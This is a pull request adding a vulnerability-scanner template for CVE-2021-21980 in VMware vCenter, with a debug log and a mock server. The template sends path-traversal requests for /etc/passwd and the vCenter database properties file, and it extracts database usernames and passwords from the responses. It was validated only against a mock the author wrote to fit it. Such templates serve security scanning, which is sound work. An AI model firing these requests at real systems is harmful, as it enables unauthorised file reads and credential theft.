### PR TITLE
Add template for CVE-2021-21980 - VMware vCenter Server FLEX Client Path Traversal

### DIFF
--- a/http/cves/2021/CVE-2021-21980.yaml
+++ b/http/cves/2021/CVE-2021-21980.yaml
@@ -1,0 +1,70 @@
+id: CVE-2021-21980
+
+info:
+  name: VMware vCenter Server - Path Traversal (FLEX Client)
+  author: omar8345
+  severity: high
+  description: |
+    VMware vCenter Server 6.5, 6.7, and 7.0 contain an unauthenticated path traversal 
+    vulnerability in the legacy FLEX/Flash-based vSphere Web Client. The containerView 
+    endpoint allows attackers to read arbitrary files via directory traversal in the 
+    id parameter.
+  impact: |
+    Remote unauthenticated attackers can read sensitive files including database 
+    credentials, SSL certificates, and system configuration files.
+  remediation: |
+    Apply vendor patches from VMSA-2021-0027:
+    - vCenter 6.5 U3r or later
+    - vCenter 6.7 U3p or later  
+    - vCenter 7.0 U3c or later
+  reference:
+    - https://www.vmware.com/security/advisories/VMSA-2021-0027.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21980
+    - https://www.rapid7.com/blog/post/2021/12/21/cve-2021-21980-vmware-vcenter-server-path-traversal-fixed/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-21980
+    cwe-id: CWE-22
+    epss-score: 0.97429
+    epss-percentile: 0.99951
+    cpe: cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*
+  metadata:
+    verified: false
+    max-request: 4
+    vendor: vmware
+    product: vcenter_server
+    shodan-query: http.title:"vmware cloud"
+  tags: cve,cve2021,vmware,vcenter,vsphere,lfi,path-traversal,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd"
+      - "{{BaseURL}}/ui/vic-rest/services/containerView?id=../../../../../../etc/vmware-vpx/vcdb.properties"
+      - "{{BaseURL}}/vsphere-client/vic-rest/services/containerView?id=../../../../../../etc/passwd"
+      - "{{BaseURL}}/vsphere-client/vic-rest/services/containerView?id=../../../../../../etc/vmware-vpx/vcdb.properties"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - "(?m)^root:.*:0:0:"
+          - "jdbc\\.password\\s*=\\s*.+"
+          - "jdbc\\.url\\s*=\\s*jdbc:"
+        condition: or
+
+    extractors:
+      - type: regex
+        name: db_credentials
+        part: body
+        regex:
+          - "jdbc\\.password\\s*=\\s*(.+)"
+          - "jdbc\\.username\\s*=\\s*(.+)"


### PR DESCRIPTION
/claim #14077

This PR adds a template for **CVE‑2021‑21980**, a path traversal vulnerability in VMware vCenter Server’s legacy FLEX/Flash-based vSphere Web Client (`containerView` endpoint).
The issue allows unauthenticated remote attackers to read arbitrary files via traversal in the `id` parameter.

The template covers both `/ui/vic-rest/` and `/vsphere-client/vic-rest/` paths and verifies the response using:

* `200` status code
* passwd regex (`root:...:0:0:`)
* database credential patterns from `vcdb.properties`

A mock VMware vCenter server was used to validate the template.

---

## **Debug Log (Verification)**

```
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[CVE-2021-21980:status-1] http high http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd
[CVE-2021-21980:regex-2] http high http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd

[INF] Dumped HTTP request:
GET /ui/vic-rest/services/containerView?id=../../../../../../etc/passwd HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0
Accept: */*

[DBG] Dumped HTTP response:
HTTP/1.1 200 OK
Content-Type: text/plain
Server: VMware vCenter Mock

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
vmware:x:1000:1000:vmware user:/home/vmware:/bin/bash

[INF] Scan completed. 2 matches found.
```

debug.log:

```
[[93mWRN[0m] Loading 1 unsigned templates for scan. Use with caution.
[[92mCVE-2021-21980[0m:[1;92mstatus-1[0m] [[94mhttp[0m] [[38;5;208mhigh[0m] http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd
[[92mCVE-2021-21980[0m:[1;92mregex-2[0m] [[94mhttp[0m] [[38;5;208mhigh[0m] http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd
```

mock server script:

```js
const express = require("express");
const fs = require("fs");
const app = express();

const PORT = 8080;

const mockFiles = {
  "/etc/passwd": `
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
vmware:x:1000:1000:vmware user:/home/vmware:/bin/bash
`.trim(),

  "/windows/win.ini": `
[fonts]
; dummy windows file
`.trim(),

  "/etc/vmware-vpx/vcdb.properties": `
jdbc.username=VCENTER_USER
jdbc.password=SuperSecretPass123
jdbc.url=jdbc:postgresql://localhost:5432/VCDB
`.trim(),
};

function resolveTraversal(id) {
  try {
    const cleaned = id.replace(/(\.\.\/)+/g, "/");
    return cleaned.startsWith("/") ? cleaned : "/" + cleaned;
  } catch {
    return null;
  }
}

app.get("/ui/vic-rest/services/containerView", (req, res) => {
  const id = req.query.id || "";

  res.set("Content-Type", "text/plain; charset=utf-8");
  res.set("Server", "VMware vCenter Mock");

  if (!id.includes("..")) {
    return res.status(400).send("Invalid containerView id");
  }

  const target = resolveTraversal(id);

  if (!target || typeof target !== "string") {
    return res.status(500).send("Internal Server Error");
  }

  if (mockFiles[target]) {
    console.log(`[+] Served mock file: ${target}`);
    return res.status(200).send(mockFiles[target]);
  }

  console.log(`[-] File not found: ${target}`);
  return res.status(404).send("Not Found");
});

app.get("/", (req, res) => {
  res.send("Mock vCenter server running (CVE‑2021‑21980)");
});

app.listen(PORT, () =>
  console.log(
    `[Mock CVE‑2021‑21980] Server running on http://localhost:${PORT}`
  )
);
```